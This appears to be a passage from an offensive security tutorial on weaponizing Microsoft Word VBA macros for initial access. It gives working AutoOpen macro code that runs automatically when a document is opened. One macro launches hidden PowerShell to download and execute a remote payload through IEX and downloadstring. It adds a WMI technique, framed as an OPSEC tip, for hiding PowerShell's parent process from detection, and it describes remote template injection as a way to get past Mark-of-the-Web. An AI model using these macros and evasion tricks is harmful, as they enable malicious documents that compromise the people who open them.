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Visual Basic for Applications (VBA) Macro

VBA is an implementation of Visual Basic that is very widely used with Microsoft Office applications - often used to enhance or augment functionality in Word and Excel for data processing etc.

VBA is not all that different from VBScript, so it’s not too difficult to use the wscript.shell object.

Note: The file must be saved in .doc format due inside .docx files cannot save macros.

To create a macro go to View -> Macros and create one.


Note: It’s important to select the document in order to save the macro inside.

Sub AutoOpen()

  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  Shell.Run "calc"

End Sub


Note: To force the macro to trigger automatically when the document is opened, use the nameAutoOpen().

Executing a Powershell Payload

Sub AutoOpen()

  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  shell.run "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring(''))"""

End Sub

Changing Prent-Child Relationship

When a powershell is executed from a word macro a child powershell.exe process is created from winword.exe (MS Word as a Parent). This isn’t normal behaviour and highly suspicious.

With wmi we can create another parent process and append the powershell to wmi and not to the MS Word.

Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell"

OPSEC Note: In that case, powershell will be a child of WmiPrvSE.exe rather than MS Word.

Remote Template Injection

Microsoft Word has the option of creating a new document from a template. Office has some templates pre-installed. Remote template injection is a technique where an attacker sends a benign document to a victim, which downloads and loads a malicious script.


This will allow to execute the macro even if its flagged with MOTW.